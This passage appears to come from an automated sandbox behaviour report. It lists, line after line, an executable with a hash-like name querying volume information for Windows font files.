                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
